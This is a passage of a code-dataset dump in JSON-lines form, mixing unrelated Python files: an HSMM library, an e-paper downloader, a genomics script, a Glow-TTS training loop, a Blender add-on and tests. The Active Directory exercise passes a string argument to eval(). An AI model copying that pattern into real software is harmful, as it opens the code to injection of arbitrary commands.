self.n_states))\n core._smoothed(n_samples, self.n_states, self.n_durations,\n beta, betastar, censoring, eta, xi, gamma)\n return gamma\n \n # _core_viterbi: container for core._viterbi (for multiple observation sequences)\n def _core_viterbi(self, u, logdur, censoring):\n n_samples = u.shape[0]\n state_sequence, log_prob = core._viterbi(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, u)\n return state_sequence, log_prob\n\n # score: log-likelihood computation from observation series\n def score(self, X, lengths=None, censoring=1):\n X = check_array(X)\n # self._init(X)\n self._check()\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n # main computations\n log_prob = 0\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n _, betastar = self._core_backward(u, logdur, censoring)\n gammazero = log_mask_zero(self.pi) + betastar[0]\n log_prob += logsumexp(gammazero)\n return log_prob\n\n # predict: hidden state & duration estimation from observation series\n def predict(self, X, lengths=None, censoring=1):\n X = check_array(X)\n # self._init(X)\n self._check()\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n # main computations\n log_prob = 0\n state_sequence = np.empty(X.shape[0], dtype=int) # total n_samples = X.shape[0]\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n iter_state_sequence, iter_log_prob = self._core_viterbi(u, logdur, censoring)\n log_prob += iter_log_prob\n state_sequence[i:j] = iter_state_sequence\n return state_sequence, log_prob\n\n # fit: parameter estimation from observation series\n def fit(self, X, lengths=None, censoring=1):\n X = check_array(X)\n self._init(X)\n self._check()\n # main computations\n for itera in range(self.n_iter):\n score = 0\n pi_num = np.full(self.n_states, -np.inf)\n tmat_num = dur_num = -np.inf\n emission_var = [None] # see \"note for programmers\" in _emission_pre_mstep() in GaussianHSMM\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n eta, xi = self._core_forward(u, logdur, censoring)\n beta, betastar = self._core_backward(u, logdur, censoring)\n gamma = self._core_smoothed(beta, betastar, censoring, eta, xi)\n score += logsumexp(gamma[0, :]) # this is the output of 'score' function\n # preparation for reestimation / M-step\n # this will make fit() slower than the previous version :(\n xi = np.resize(xi, (j - i + 1, self.n_states, self.n_states))\n eta = np.resize(eta, (j - i + 1, self.n_states, self.n_durations))\n xi[j - i] = tmat_num\n eta[j - i] = dur_num\n pi_num = logsumexp([pi_num, gamma[0]], axis=0)\n tmat_num = logsumexp(xi, axis=0)\n dur_num = logsumexp(eta, axis=0)\n self._emission_pre_mstep(gamma, emission_var)\n # check for loop break\n if itera > 0 and (score - old_score) < self.tol:\n print(\"FIT: converged at {}th loop.\".format(itera + 1))\n break\n else:\n old_score = score\n # reestimation / M-step\n self.pi = np.exp(pi_num - logsumexp(pi_num))\n self.tmat = np.exp(tmat_num - logsumexp(tmat_num, axis=1)[None].T)\n new_dur = np.exp(dur_num - logsumexp(dur_num, axis=1)[None].T)\n self._dur_mstep(new_dur) # new durations\n self._emission_mstep(X, emission_var[0]) # new emissions\n print(\"FIT: reestimation complete for {}th loop.\".format(itera + 1))\n\n# Sample Subclass: Explicit Duration HSMM with Gaussian Emissions\nclass GaussianHSMM(HSMM):\n def __init__(self, n_states=2, n_durations=5, n_iter=20, tol=1e-2, rnd_state=None):\n super().__init__(n_states, n_durations, n_iter, tol, rnd_state)\n\n def _init(self, X):\n super()._init()\n # note for programmers: for every attribute that needs X in score()/predict()/fit(),\n # there must be a condition 'if X is None' because sample() doesn't need an X, but\n # default attribute values must be initiated for sample() to proceed.\n if True: # always change self.n_dim\n if X is None: # default for sample()\n self.n_dim = 1\n else:\n self.n_dim = X.shape[1]\n if not hasattr(self, \"mean\"):\n if X is None: # default for sample()\n # self.mean = [[0.], [1.], [2.], ...]\n self.mean = np.arange(0., self.n_states)[:, None]\n else:\n kmeans = cluster.KMeans(n_clusters=self.n_states, random_state=self.rnd_state)\n kmeans.fit(X)\n self.mean = kmeans.cluster_centers_\n if not hasattr(self, \"covmat\"):\n if X is None: # default for sample()\n self.covmat = np.repeat(np.identity(self.n_dim)[None], self.n_states, axis=0)\n else:\n # TODO: initial covariance matrices must be computed from X\n self.covmat = np.repeat(np.identity(self.n_dim)[None], self.n_states, axis=0)\n\n def _check(self):\n super()._check()\n # means\n self.mean = np.asarray(self.mean)\n if self.mean.shape != (self.n_states, self.n_dim):\n raise ValueError(\"means (self.mean) must have shape ({}, {})\"\n .format(self.n_states, self.n_dim))\n # covariance matrices\n self.covmat = np.asarray(self.covmat)\n if self.covmat.shape != (self.n_states, self.n_dim, self.n_dim):\n raise ValueError(\"covariance matrices (self.covmat) must have shape ({0}, {1}, {1})\"\n .format(self.n_states, self.n_dim))\n\n def _dur_init(self):\n # non-parametric duration\n if not hasattr(self, \"dur\"):\n self.dur = np.full((self.n_states, self.n_durations), 1.0 / self.n_durations)\n\n def _dur_check(self):\n self.dur = np.asarray(self.dur)\n if self.dur.shape != (self.n_states, self.n_durations):\n raise ValueError(\"duration probabilities (self.dur) must have shape ({}, {})\"\n .format(self.n_states, self.n_durations))\n if not np.allclose(self.dur.sum(axis=1), 1.0):\n raise ValueError(\"duration probabilities (self.dur) must add up to 1.0\")\n\n def _dur_probmat(self):\n # non-parametric duration\n return self.dur\n\n def _dur_mstep(self, new_dur):\n # non-parametric duration\n self.dur = new_dur\n \n def _emission_logprob(self, X):\n # abort EM loop if any covariance matrix is not symmetric, positive-definite.\n # adapted from hmmlearn 0.2.3 (see _utils._validate_covars function)\n for n, cv in enumerate(self.covmat):\n if (not np.allclose(cv, cv.T) or np.any(np.linalg.eigvalsh(cv) <= 0)):\n raise ValueError(\"component {} of covariance matrix is not symmetric, positive-definite.\"\n .format(n))\n # https://www.youtube.com/watch?v=tWoFaPwbzqE&t=1694s\n n_samples = X.shape[0]\n logframe = np.empty((n_samples, self.n_states))\n for i in range(self.n_states):\n multigauss = multivariate_normal(self.mean[i], self.covmat[i])\n for j in range(n_samples):\n logframe[j, i] = log_mask_zero(multigauss.pdf(X[j]))\n return logframe\n \n def _emission_pre_mstep(self, gamma, emission_var):\n # note for programmers: refer to \"emission_var\" as emission_var[0] here. Maybe this\n # is unidiomatic, but this is done to force pass-by-reference to the np.ndarray.\n # note #2: The \"emssion_var\" here is the cumulative concatenation of the gammas of each\n # observation sequence, so most likely you wouldn't modify this for your own subclass.\n if emission_var[0] is None: # initial\n emission_var[0] = gamma\n else:\n old_emitlength = emission_var[0].shape[0]\n emission_var[0] = np.resize(emission_var[0], (old_emitlength + gamma.shape[0], self.n_states))\n emission_var[0][old_emitlength:] = gamma\n\n def _emission_mstep(self, X, emission_var):\n # note for programmers: now refer to \"emission_var\" as it is, here.\n denominator = logsumexp(emission_var, axis=0)\n weight_normalized = np.exp(emission_var - denominator)[None].T\n # compute means (from definition; weighted)\n self.mean = (weight_normalized * X).sum(1)\n # compute covariance matrices (from definition; weighted)\n dist = X - self.mean[:, None]\n self.covmat = ((dist * weight_normalized)[:, :, :, None] * dist[:, :, None]).sum(1)\n \n def _state_sample(self, state, rnd_state=None):\n rnd_checked = check_random_state(rnd_state)\n return rnd_checked.multivariate_normal(self.mean[state], self.covmat[state])\n","sub_path":"edhsmm/hsmm_base.py","file_name":"hsmm_base.py","file_ext":"py","file_size_in_byte":18163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533811630","text":"import requests\nimport shutil\nfrom datetime import datetime\n\ntoday = datetime.now()\ndt = today.strftime(\"%d%m%Y\")\nimg_pre = (\n \"https://epaper.anandabazar.com/epaperimages////\" + dt + \"////\" + dt + \"-md-hr-\"\n)\nimg_post = \"ll.png\"\n\ni = 1\nimage_url = img_pre + str(i) + img_post\nr = requests.get(image_url, stream=True)\nwhile r.status_code == 200:\n r.raw.decode_content = True\n filename = dt + \"_\" + str(i) + \".png\"\n with open(filename, \"wb\") as f:\n shutil.copyfileobj(r.raw, f)\n i += 1\n image_url = img_pre + str(i) + img_post\n r = requests.get(image_url, stream=True, allow_redirects=False)\n","sub_path":"download_epaper.py","file_name":"download_epaper.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481460465","text":"\nimport os\nfrom Functions import *\n\nrepD={}\nfor i in read_file('bed/BedIntersect.TadCs.Repeats.bed'):\n\ti=i.split('\\t')\n\tcC=i[3]\n\tcPos=int(i[3].split('.')[1])\n\tif int(i[7])<=cPos and cPos<=int(i[8]):\n\t\ttry:\n\t\t\t#repD[cC]+=[i[9].split('|')[0]]\n\t\t\trepD[i[9].split('|')[0]]+=[cC]\n\t\texcept KeyError:\n\t\t\trepD[i[9].split('|')[0]]=[cC]\n\t\t\t#repD[cC]=[i[9].split('|')[0]]\n\ncorD={}\nfor i in read_file('output/Correlation/Step2/TadCorrelations.txt')[1:]:\n\ti=i.split('\\t')\n\tcC=i[0].replace('.NA0','')\n\ttry:\n\t\tcorD[i[7]]+=[cC]\n\texcept KeyError:\n\t\tcorD[i[7]]=[cC]\ncKeys=sorted(corD.keys())\n\nallCs=[x.split('\\t')[3] for x in read_file('bed/ForTadCEvol.bed')]\nrepCs=[item for sublist in repD.values() for item in sublist]\ncorCs=[item for sublist in corD.values() for item in sublist]\n\ns='Background\\t'+'\\t'.join(cKeys)+'\\n'\n\ns+='NoRep\\t%s' % (len(list(set(allCs).difference(set(repCs)))))\nfor j in cKeys:\n\ts+='\\t%s' % (len(list(set(corD[j]).difference(set(repCs)))))\ns+='\\n'\n\ns+='InReps\\t%s' % (len(list(set(allCs).intersection(set(repCs)))))\nfor j in cKeys:\n\ts+='\\t%s' % (len(list(set(corD[j]).intersection(set(repCs)))))\ns+='\\n'\n\nfor i in sorted(repD.keys()):\n\ts+='%s\\t%s' % (i,len(repD[i]))\n\tfor j in cKeys:\n\t\ts+='\\t%s' % (len(list(set(repD[i]).intersection(set(corD[j])))))\n\ts+='\\n'\nwrite_file('output/TAD.C_in_Repeats.txt',s)\n\n\n\n\n\n","sub_path":"Step035.mCs.py","file_name":"Step035.mCs.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609041280","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 14 05:54:21 2019\n\n@author: nitinkotcherlakota\n\"\"\"\n\n#Active Directory\nclass Group(object):\n def __init__(self, _name):\n self.name = _name\n self.groups = []\n self.users = []\n\n def add_group(self, group):\n self.groups.append(group)\n\n def add_user(self, user):\n self.users.append(user)\n\n def get_groups(self):\n return self.groups\n\n def get_users(self):\n return self.users\n\n def get_name(self):\n return self.name\n \n\nparent = Group(\"parent\")\nchild = Group(\"child\")\nsub_child = Group(\"subchild\")\n\n\nsub_child_user = \"sub_child_user\"\nsub_child.add_user(sub_child_user)\n\nchild.add_group(sub_child)\nparent.add_group(child)\n\nchild.add_user(\"child_user\")\nchild.add_user(\"child_user1\")\nchild.add_user(\"child_user2\")\n\ndef is_user_in_group(user, group):\n if isinstance(group, str):\n group = eval(group)\n if user == group.get_name():\n return True\n if user in group.get_users():\n return True\n for grp in group.get_groups():\n return is_user_in_group(user,grp)\nprint(\"Is child in Parent group? \",is_user_in_group(\"child\",parent)) #True\nprint(\"Is Sub child user in parent group? \",is_user_in_group(\"sub_child_user\",parent)) #True\nprint(\"Is parent in child group? \",is_user_in_group(\"parent\",child)) #None\nprint(\"Entering blank data:\", is_user_in_group(\"\",parent)) #None","sub_path":"ActiveDirectory.py","file_name":"ActiveDirectory.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276379717","text":"import os\nimport json\nimport argparse\nimport math\nimport numpy as np\nimport copy\nimport torch\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nimport matplotlib.pyplot as plt\n\nfrom apex.parallel import DistributedDataParallel as DDP\nfrom apex import amp\n\nfrom data_utils import TextMelLoader, TextMelCollate\nimport models\nimport commons\nimport utils\nfrom text.symbols import symbols\n \n\nglobal_step = 0\n\n\ndef main():\n \"\"\"Assume Single Node Multi GPUs Training Only\"\"\"\n assert torch.cuda.is_available(), \"CPU training is not allowed.\"\n torch.cuda.empty_cache()\n\n n_gpus = torch.cuda.device_count()\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '80001'\n\n hps = utils.get_hparams()\n mp.spawn(train_and_eval, nprocs=n_gpus, args=(n_gpus, hps,))\n\n\ndef train_and_eval(rank, n_gpus, hps):\n global global_step\n \n ## Added as part of MSc Thesis - Transformer optimization\n global global_omega\n global prev_l_head_wt\n global prev_l_qry_wt\n \n if rank == 0:\n logger = utils.get_logger(hps.model_dir)\n logger.info(hps)\n utils.check_git_hash(hps.model_dir)\n writer = SummaryWriter(log_dir=hps.model_dir)\n writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, \"eval\"))\n\n dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, rank=rank)\n torch.manual_seed(hps.train.seed)\n torch.cuda.set_device(rank)\n\n train_dataset = TextMelLoader(hps.data.training_files, hps.data)\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset,\n num_replicas=n_gpus,\n rank=rank,\n shuffle=True)\n collate_fn = TextMelCollate(1)\n train_loader = DataLoader(train_dataset, num_workers=8, shuffle=False,\n batch_size=hps.train.batch_size, pin_memory=True,\n drop_last=True, collate_fn=collate_fn, sampler=train_sampler)\n if rank == 0:\n val_dataset = TextMelLoader(hps.data.validation_files, hps.data)\n val_loader = DataLoader(val_dataset, num_workers=8, shuffle=False,\n batch_size=hps.train.batch_size, pin_memory=True,\n drop_last=True, collate_fn=collate_fn)\n\n generator = models.FlowGenerator(\n n_vocab=len(symbols) + getattr(hps.data, \"add_blank\", False), \n out_channels=hps.data.n_mel_channels, \n **hps.model).cuda(rank)\n if hps.model.mask_flag == 'Y':\n dim_m = (hps.model.hidden_channels / hps.model.n_heads) * (hps.model.n_heads - len(hps.model.mask_heads))\n else:\n dim_m = hps.model.hidden_channels\n #print(dim_m)\n optimizer_g = commons.Adam(generator.parameters(), scheduler=hps.train.scheduler, dim_model=dim_m, warmup_steps=hps.train.warmup_steps, lr=hps.train.learning_rate, betas=hps.train.betas, eps=hps.train.eps)\n if hps.train.fp16_run:\n generator, optimizer_g._optim = amp.initialize(generator, optimizer_g._optim, opt_level=\"O1\")\n generator = DDP(generator)\n epoch_str = 1\n global_step = 0\n \n ## Added as part of MSc Thesis - Transformer optimization\n global_omega = np.zeros((4, 8), dtype=float)\n prev_l_head_wt = np.zeros((4, 8), dtype=float)\n prev_l_qry_wt = np.zeros((4, 8), dtype=float)\n \n \n try:\n _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, \"G_*.pth\"), generator, optimizer_g)\n epoch_str += 1\n optimizer_g.step_num = (epoch_str - 1) * len(train_loader)\n optimizer_g._update_learning_rate()\n global_step = (epoch_str - 1) * len(train_loader)\n global_omega = 0\n\n except:\n if hps.train.ddi and os.path.isfile(os.path.join(hps.model_dir, \"ddi_G.pth\")):\n _ = utils.load_checkpoint(os.path.join(hps.model_dir, \"ddi_G.pth\"), generator, optimizer_g)\n loss_train = []\n loss_val = []\n \n best_epoch = 1\n loss_diff = 0.0\n cnt = 0\n\n for epoch in range(epoch_str, hps.train.epochs + 1):\n if rank==0:\n train(rank, epoch, hps, generator, optimizer_g, train_loader, logger, writer,loss_train)\n evaluate(rank, epoch, hps, generator, optimizer_g, val_loader, logger, writer_eval,loss_val)\n \n\n utils.save_checkpoint(generator, optimizer_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, \"G_{}.pth\".format(epoch)))\n else:\n train(rank, epoch, hps, generator, optimizer_g, train_loader, None, None)\n \n ## Added as part of MSc Thesis - Transformer optimization\n print(\"Loss: \",loss_train)\n print(\"Loss Val: \",loss_val) \n# loss_diff = abs(loss_val[epoch-1].item() - loss_train[epoch-1].item())\n# # print(\"loss_diff: \",loss_diff)\n# if loss_diff > 0.1:\n# best_epoch = epoch - 1\n# cnt += 1\n# print(\"cnt: \",cnt)\n# else:\n# cnt = 0\n# best_epoch = epoch - 1\n# if cnt > 5:\n# break\n# print(\"loss: \",loss_val)\n# print(\"Best Epoch: \",best_epoch)\n \n fig = plt.figure()\n plt.title(\"Loss vs. Number of Training Epochs\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Loss\")\n plt.plot(range(1,hps.train.epochs + 1),loss_train,label='Train')\n plt.plot(range(1,hps.train.epochs + 1),loss_val,label='Validation')\n# plt.plot(range(1,best_epoch + 2),loss_train,label='Train')\n# plt.plot(range(1,best_epoch + 2),loss_val,label='Validation')\n plt.legend()\n fignm=\"/content/gdrive/MyDrive/Colab Notebooks/Project/glow-tts/logs/fig_\"+str(epoch)+\".png\"\n fig.savefig(fignm)\n print(\"global_omega: \",global_omega)\n print(\"global_omega_idx_sort: \", np.argsort(global_omega))\n arr1 = np.array(global_omega).flatten()\n print(arr1.argsort())\n\ndef train(rank, epoch, hps, generator, optimizer_g, train_loader, logger, writer,loss_train):\n train_loader.sampler.set_epoch(epoch)\n global global_step\n \n ## Added as part of MSc Thesis - Transformer optimization\n global global_omega\n global prev_l_head_wt\n global prev_l_qry_wt\n losses_tot1 = []\n omega = global_omega\n grad = np.zeros((4, 8), dtype=float)\n \n generator.train()\n for batch_idx, (x, x_lengths, y, y_lengths) in enumerate(train_loader):\n x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True)\n y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True)\n\n\n # Train Generator\n optimizer_g.zero_grad()\n \n (z, z_m, z_logs, logdet, z_mask), (x_m, x_logs, x_mask, l_head_wt, l_qry_wt, l_attn_wt), (attn, logw, logw_) = generator(x, x_lengths, y, y_lengths, gen=False)\n l_mle = commons.mle_loss(z, z_m, z_logs, logdet, z_mask)\n l_length = commons.duration_loss(logw, logw_, x_lengths)\n\n loss_gs = [l_mle, l_length]\n loss_g = sum(loss_gs)\n #print(\"prev_l_qry_wt: \",prev_l_qry_wt)\n if batch_idx == 0:\n losses_tot1 = loss_gs\n else:\n losses_tot1 = [x + y for (x, y) in zip(losses_tot1, loss_gs)]\n \n\n ## Added as part of MSc Thesis - Transformer optimization \n diff_qry = np.abs(l_qry_wt - prev_l_qry_wt)\n #print(\"diff_qry: \",diff_qry)\n grad = (np.abs(l_head_wt - prev_l_head_wt)/ l_head_wt) * diff_qry \n current_size = (batch_idx+1)* hps.train.batch_size #batch_size - 8\n step_size = 1/float(current_size)\n \n #Incremental update for the omega\n omega = omega + step_size*grad \n\n if hps.train.fp16_run:\n with amp.scale_loss(loss_g, optimizer_g._optim) as scaled_loss:\n scaled_loss.backward()\n grad_norm = commons.clip_grad_value_(amp.master_params(optimizer_g._optim), 5)\n else:\n loss_g.backward()\n grad_norm = commons.clip_grad_value_(generator.parameters(), 5)\n optimizer_g.step()\n \n if rank==0:\n if batch_idx % hps.train.log_interval == 0:\n (y_gen, *_), *_ = generator.module(x[:1], x_lengths[:1], gen=True)\n logger.info('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader),\n loss_gs[0].item()))\n logger.info([x.item() for x in loss_gs] + [global_step, optimizer_g.get_lr()])\n \n scalar_dict = {\"loss/g/total\": loss_g, \"learning_rate\": optimizer_g.get_lr(), \"grad_norm\": grad_norm}\n scalar_dict.update({\"loss/g/{}\".format(i): v for i, v in enumerate(loss_gs)})\n utils.summarize(\n writer=writer,\n global_step=global_step, \n images={\"y_org\": utils.plot_spectrogram_to_numpy(y[0].data.cpu().numpy()), \n \"y_gen\": utils.plot_spectrogram_to_numpy(y_gen[0].data.cpu().numpy()), \n \"attn\": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()),\n },\n scalars=scalar_dict)\n global_step += 1\n \n ## Added as part of MSc Thesis - Transformer optimization\n prev_l_head_wt = copy.deepcopy(l_head_wt)\n prev_l_qry_wt = copy.deepcopy(l_qry_wt)\n #print(\"global_step: \",global_step)\n global_omega += (1/((hps.train.epochs + 1) - epoch))*omega\n \n losses_tot1 = [x/len(train_loader) for x in losses_tot1]\n #losses_tot1 = [x/2 for x in losses_tot1]\n #loss_tot1 = sum(losses_tot1)\n loss_tot1 = losses_tot1[0]\n loss_train.append(loss_tot1.detach())\n\n if rank == 0:\n logger.info('====> Epoch: {}'.format(epoch))\n\n \ndef evaluate(rank, epoch, hps, generator, optimizer_g, val_loader, logger, writer_eval,loss_val):\n if rank == 0:\n global global_step\n generator.eval()\n losses_tot = []\n with torch.no_grad():\n for batch_idx, (x, x_lengths, y, y_lengths) in enumerate(val_loader):\n x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True)\n y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True)\n\n (z, z_m, z_logs, logdet, z_mask), (x_m, x_logs, x_mask, l_head_wt, l_qry_wt, l_attn_wt), (attn, logw, logw_) = generator(x, x_lengths, y, y_lengths, gen=False)\n l_mle = commons.mle_loss(z, z_m, z_logs, logdet, z_mask)\n l_length = commons.duration_loss(logw, logw_, x_lengths)\n\n loss_gs = [l_mle, l_length]\n loss_g = sum(loss_gs)\n\n if batch_idx == 0:\n losses_tot = loss_gs\n else:\n losses_tot = [x + y for (x, y) in zip(losses_tot, loss_gs)]\n\n if batch_idx % hps.train.log_interval == 0:\n logger.info('Eval Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(val_loader.dataset),\n 100. * batch_idx / len(val_loader),\n loss_gs[0].item()))\n logger.info([x.item() for x in loss_gs])\n \n \n losses_tot = [x/len(val_loader) for x in losses_tot]\n #loss_tot = sum(losses_tot)\n loss_tot = losses_tot[0]\n loss_val.append(loss_tot.detach())\n scalar_dict = {\"loss/g/total\": loss_tot}\n scalar_dict.update({\"loss/g/{}\".format(i): v for i, v in enumerate(losses_tot)})\n utils.summarize(\n writer=writer_eval,\n global_step=global_step, \n scalars=scalar_dict)\n logger.info('====> Epoch: {}'.format(epoch))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"118770026","text":"from algosdk.v2client import algod\r\nimport os\r\n\r\n\r\n# Setup HTTP client w/guest key provided by PureStake\r\nclass Connect:\r\n def __init__(self):\r\n # declaring the third party API\r\n self.algod_address = os.environ.get('PURESTAKE_URL')\r\n # <-----shortened - my personal API token\r\n self.algod_token = os.environ.get('PERSONAL_API_TOKEN_PURESTAKE')\r\n self.headers = {\"X-API-Key\": self.algod_token}\r\n\r\n def connectToNetwork(self):\r\n # establish connection\r\n return algod.AlgodClient(self.algod_token, self.algod_address, self.headers)\r\n\r\n\r\nconnect = Connect()\r\nalgo_client = connect.connectToNetwork()\r\nparams = algo_client.suggested_params()","sub_path":"connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"512640232","text":"from enum import Enum, auto\nimport cv2\nimport numpy as np\n\nclass ColorSpace(Enum):\n BGR = auto()\n RGB = auto()\n HSV = auto()\n GRAY = auto()\n\nclass ImagePreprocessor:\n def __init__(self, original_images, color=ColorSpace.BGR):\n # original images have bgr color space\n # original_images.shape is (image_num, height, width, channel)\n self.original_images = original_images\n self.color = ColorSpace.BGR\n if original_images.shape[3] != 3: # if gray\n self.color = ColorSpace.GRAY\n # size.shape is (width, height)\n def preprocess(self, size, color=None, do_normalize=True):\n images = self.__resize(self.original_images, size)\n \n if self.color == color:\n print(f'Already color space is {color}.')\n elif self.color == ColorSpace.GRAY: # if gray\n print('image color is gray')\n elif color is None:\n pass\n else:\n images = self.__cnvcolor(images, color)\n \n if do_normalize:\n images = self.__normalize(images)\n return images\n\n \n \n def threshold(self, size, color, thresholds):\n images = self.__resize(self.original_images, size)\n if self.color != color:\n images = self.__cnvcolor(images, color)\n str_color = str(color).split('.')[1]\n def _threshold(image):\n res = []\n for channel, image_one_channel in zip(str_color, cv2.split(image)):\n _, image_thresholded = cv2.threshold(image_one_channel, thresholds[channel], 255, cv2.THRESH_BINARY)\n res.append(np.expand_dims(image_thresholded, -1))\n # concatenate channel(e.g. r+g+b -> rgb)\n return np.concatenate(res, -1)\n \n return self.__normalize(np.array([_threshold(x) for x in images]))\n \n \n def __resize(self, images, size):\n return np.asarray([cv2.resize(x, size, interpolation=cv2.INTER_AREA) for x in images], dtype=np.float32)\n \n \n def __cnvcolor(self, images, color):\n if self.color == color:\n return images\n \n convert_enum = None\n \n if self.color == ColorSpace.BGR:\n if color == ColorSpace.RGB:\n convert_enum = cv2.COLOR_BGR2RGB\n elif color == ColorSpace.HSV:\n convert_enum = cv2.COLOR_BGR2HSV\n elif self.color == ColorSpace.RGB:\n if color == ColorSpace.BGR:\n convert_enum = cv2.COLOR_RGB2BGR\n elif color == ColorSpace.HSV:\n convert_enum = cv2.COLOR_RGB2HSV\n \n return np.array([cv2.cvtColor(x, convert_enum) for x in images])\n\n \n def __normalize(self, images):\n if len(images.shape) == 3:\n images = np.expand_dims(images, -1)\n \n normalized_images = np.empty_like(images)\n for i in range(images.shape[3]):\n max_val = np.max(images[:, :, :, i])\n normalized_images[:, :, :, i] = images[:, :, :, i] / max_val\n return normalized_images\n \n \n def normalize(self, images):\n return self.__normalize(images)\n \n \n","sub_path":"jscas_ai_challenge_2020_data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78733926","text":"import bpy\nfrom bpy.props import BoolProperty\n\n\n\ndef set_active_tool(tool_name):\n for area in bpy.context.screen.areas:\n if area.type == \"VIEW_3D\":\n override = bpy.context.copy()\n override[\"space_data\"] = area.spaces[0]\n override[\"area\"] = area\n bpy.ops.wm.tool_set_by_id(override, name=tool_name)\n \n\ndef TglCursor(oStartSnap,oEndSnap,oShowCursor):\n Scene = bpy.data.scenes['Scene']\n Snap = Scene.tool_settings.use_snap\n SnapElement = Scene.tool_settings.snap_elements\n Tra = Scene.transform_orientation_slots[0].type\n Pivot = Scene.tool_settings.transform_pivot_point\n ovl = bpy.context.space_data.overlay\n\n if Tra != 'CURSOR':\n set_active_tool(\"builtin.cursor\")\n Scene.transform_orientation_slots[0].type = 'CURSOR'\n ovl.show_cursor = True\n Scene.tool_settings.use_snap = oStartSnap\n Scene.tool_settings.snap_elements = {'VERTEX'}\n Scene.tool_settings.transform_pivot_point = 'CURSOR'\n else:\n Scene.transform_orientation_slots[0].type = 'GLOBAL'\n Scene.tool_settings.use_snap = oEndSnap\n Scene.tool_settings.transform_pivot_point = 'BOUNDING_BOX_CENTER'\n ovl.show_cursor = oShowCursor\n\nclass tglPivot_OT_object(bpy.types.Operator):\n bl_idname = \"view3d.toggle_pivot_mode\"\n bl_label = \"toggle pivot mode\"\n bl_description = \"toggle pivot mode\"\n bl_options = {'REGISTER', 'UNDO'} \n\n bSnap = BoolProperty(default=False, name = \"start Snap\", description = \"Corser Active Snap\")\n eSnap = BoolProperty(default=False, name = \"end Snap\", description = \"Finish Active Snap\")\n oShow = BoolProperty(default=True, name = \"Show Cursor\", description = \"Show cursor\")\n def execute(self, context,):\n\n TglCursor(self.bSnap,self.eSnap,self.oShow)\n\n return {'FINISHED'}\n","sub_path":"Tgl_Pivot.py","file_name":"Tgl_Pivot.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"116291843","text":"import unittest\nimport os\nimport sys\nimport boto3\nimport json\nsys.path.insert(0, './')\nimport add_cluster\nfrom moto import mock_dynamodb2\n\nclass TestAddCluster(unittest.TestCase):\n \"\"\"Testing for add_cluster.py\"\"\"\n\n @mock_dynamodb2\n def test_add_cluster(self):\n \"\"\"Setup DynamoDB tables for hyper-kube-config\n \"\"\"\n\n os.environ[\"DYNAMODB_TABLE_K8_CLUSTERS\"] = \"hyper-kube-config-test\"\n self.dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n self.dynamodb.create_table(\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n ],\n TableName='hyper-kube-config-test',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 5\n },\n )\n self.hyper_kube_config_table = self.dynamodb.Table(os.environ[\"DYNAMODB_TABLE_K8_CLUSTERS\"])\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/add_cluster_test.py","file_name":"add_cluster_test.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637604530","text":"import 